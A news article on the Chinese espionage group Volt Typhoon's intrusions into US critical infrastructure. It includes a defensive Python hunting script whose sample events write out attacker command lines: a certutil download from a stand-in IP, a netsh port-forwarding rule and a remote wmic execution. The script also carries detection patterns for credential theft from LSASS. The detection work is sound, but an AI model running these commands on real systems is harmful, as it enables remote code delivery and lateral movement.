
Chinese Cyberespionage Group ‘Volt Typhoon’ Targets Critical Infrastructure in the United States

Microsoft has identified a Chinese cyberespionage group known as Volt Typhoon, which has been conducting targeted attacks on critical infrastructure organizations across the United States, including Guam, since mid-2021.

The group’s activities span various sectors, such as government, maritime, communications, manufacturing, information technology, utilities, transportation, construction, and education.

Microsoft’s Threat Intelligence team believes that Volt Typhoon aims to develop capabilities that could disrupt vital communications infrastructure between the United States and Asia during future crises.

Who is Volt Typhoon and what are their targets?

Volt Typhoon is a Chinese cyberespionage group identified by Microsoft. They have been targeting critical infrastructure organizations in the United States, including Guam, since mid-2021.

Their targets encompass sectors like government, maritime, communications, manufacturing, information technology, utilities, transportation, construction, and education.

What is the objective of the Volt Typhoon campaign?

The Volt Typhoon campaign, according to Microsoft’s assessment, aims to develop capabilities that could disrupt critical communications infrastructure between the United States and the Asia region during future crises.

How does Volt Typhoon gain access to targeted networks?

Volt Typhoon gains initial access through Internet-exposed Fortinet FortiGuard devices. At the time of Microsoft's report the flaw being exploited had not been disclosed and was described as a zero-day; Microsoft said it was still investigating how the devices were being compromised.

Once inside a network, the group relies on hands-on-keyboard activity and “living-off-the-land” tactics: rather than dropping custom malware, it abuses binaries already present on Windows hosts (LOLBins) such as PowerShell, Certutil, Netsh, and the Windows Management Instrumentation Command-line (WMIC), so that its activity looks like routine administration.

Which tools does Volt Typhoon employ in their attacks?

In addition to their own tools, Volt Typhoon has been observed using open-source tools like Fast Reverse Proxy (frp), the Mimikatz credential-stealing tool, and the Impacket networking framework.

These details were included in a joint advisory released by the FBI, NSA, CISA, and cybersecurity agencies from Australia, New Zealand, the United Kingdom, and Canada.

How does Volt Typhoon evade detection?

To evade detection, Volt Typhoon routes its traffic through compromised small office and home office (SOHO) network equipment from various manufacturers, including ASUS, Cisco, D-Link, Netgear, FatPipe, and Zyxel. Because these routers, firewalls, and VPN appliances sit on ordinary residential and small-business connections, the group's command-and-control and lateral traffic appears to originate from legitimate sources and blends in with normal network activity.

Volt Typhoon Attack Flow (Source: Microsoft)

What privileges do the hackers obtain after compromising Fortinet devices?

After compromising the Fortinet devices, the group uses the privileged access it obtains to dump credentials from the Local Security Authority Subsystem Service (LSASS) process on Windows hosts, and then uses those credentials to deploy Awen-based web shells.

These web shells facilitate data exfiltration and persistence on compromised systems.
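The two host-side behaviours described above, LOLBin abuse and credential access against LSASS, are the parts of this campaign a defender can actually hunt for in endpoint telemetry, because the binaries involved are legitimate and the only signal is context (arguments, source process, access rights). The following is an added example written for this article, not code from Microsoft, the joint advisory, or the article itself. It runs simple detection logic over constructed Sysmon-style process-creation (Event ID 1) and process-access (Event ID 10) records; the argument patterns and the LSASS allowlist are generic abuse indicators chosen for illustration, not indicators the article attributes to Volt Typhoon.

```python
"""Hunt Windows process telemetry for LOLBin abuse and LSASS credential access.

Added example (not from the article or its sources). The event records below are
constructed Sysmon-style events, and the regexes / allowlist are assumptions
chosen for illustration, not indicators published for Volt Typhoon.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# The living-off-the-land binaries the article names.
LOLBINS = {"powershell.exe", "certutil.exe", "netsh.exe", "wmic.exe"}

# Argument patterns that turn each legitimate binary into an attacker primitive
# (download, decode, port forwarding, remote execution). Assumption: generic
# abuse signatures picked for the example.
SUSPICIOUS_ARGS = {
    "powershell.exe": re.compile(r"(?i)(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring)"),
    "certutil.exe": re.compile(r"(?i)(-urlcache|-decode|-encode)"),
    "netsh.exe": re.compile(r"(?i)portproxy\s+add"),
    "wmic.exe": re.compile(r"(?i)process\s+call\s+create"),
}

# Processes that legitimately open LSASS on a typical host. Assumption: a
# site-specific allowlist that a real deployment would baseline itself.
LSASS_READERS_ALLOWED = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}

# Access-mask bit that lets a caller read LSASS memory (PROCESS_VM_READ).
PROCESS_VM_READ = 0x0010


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(ev: Dict[str, str]) -> Optional[Finding]:
    """Event ID 1: flag a named LOLBin only when its arguments look abusive."""
    image = basename(ev["Image"])
    if image not in LOLBINS:
        return None
    cmd = ev.get("CommandLine", "")
    if SUSPICIOUS_ARGS[image].search(cmd):
        return Finding(ev["Computer"], f"lolbin:{image}", cmd)
    return None


def check_process_access(ev: Dict[str, str]) -> Optional[Finding]:
    """Event ID 10: flag a non-allowlisted process opening LSASS for memory reads."""
    if basename(ev["TargetImage"]) != "lsass.exe":
        return None
    source = ev["SourceImage"].lower()
    granted = int(ev["GrantedAccess"], 16)
    if source in LSASS_READERS_ALLOWED or not (granted & PROCESS_VM_READ):
        return None
    return Finding(ev["Computer"], "lsass-access", f"{source} GrantedAccess={ev['GrantedAccess']}")


def hunt(events: List[Dict[str, str]]) -> List[Finding]:
    """Run the two checks over a stream of events and collect findings in order."""
    findings = []
    for ev in events:
        f = check_process_create(ev) if ev["EventID"] == "1" else check_process_access(ev)
        if f:
            findings.append(f)
    return findings


# Constructed sample telemetry: two benign LOLBin uses, three abusive ones, one
# benign LSASS open by wininit and one from an unexpected binary.
SAMPLE_EVENTS = [
    {"EventID": "1", "Computer": "WS01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-Service"},
    {"EventID": "1", "Computer": "WS01", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://198.51.100.7/x.txt C:\Users\Public\x.txt"},
    {"EventID": "1", "Computer": "SRV02", "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.5 connectport=8443"},
    {"EventID": "1", "Computer": "SRV02", "Image": r"C:\Windows\System32\wbem\wmic.exe",
     "CommandLine": 'wmic /node:FILESRV01 process call create "cmd /c whoami"'},
    {"EventID": "10", "Computer": "SRV02", "SourceImage": r"C:\Windows\System32\wininit.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"EventID": "10", "Computer": "SRV02", "SourceImage": r"C:\Users\Public\rundll32.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": "1", "Computer": "WS01", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify C:\certs\intranet.cer"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:6} {f.rule:22} {f.detail}")
```

The point of keying on arguments and access masks rather than on binary names is exactly the problem living-off-the-land creates: `certutil -verify` and `certutil -urlcache` are the same signed Microsoft binary, and `wininit` and a stray `rundll32` both open LSASS, so a rule on names alone either floods the queue or misses the intrusion. In production the allowlist and thresholds should be baselined per environment, and the regexes treated as a starting point, not a complete signature set.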

What is the potential motive behind Volt Typhoon’s attacks on US critical infrastructure?

According to Mandiant Intelligence Chief Analyst John Hultquist, these intrusions into US critical infrastructure organizations are likely part of a concerted effort to grant China access in the event of a future conflict between the two countries.

Hultquist suggests that targeting critical infrastructure is a common practice among states as they prepare for possible conflicts.

Is an imminent cyberattack expected from Volt Typhoon?

While the operations conducted by Volt Typhoon are aggressive and potentially dangerous, they do not necessarily indicate an immediate attack.

Similar long-term intrusions into critical infrastructure have been observed in the past by countries like Russia, targeting sectors such as oil and gas. However, these activities serve as preparations rather than indications of imminent attacks.

Microsoft has proactively reached out to the targeted or compromised customers to provide them with the necessary.

William Marshal

William has been one of the key contributors to 'The Cybersecurity Times', with 9.5 years of experience in cybersecurity journalism. Apart from writing, he also likes hiking, skating and coding.
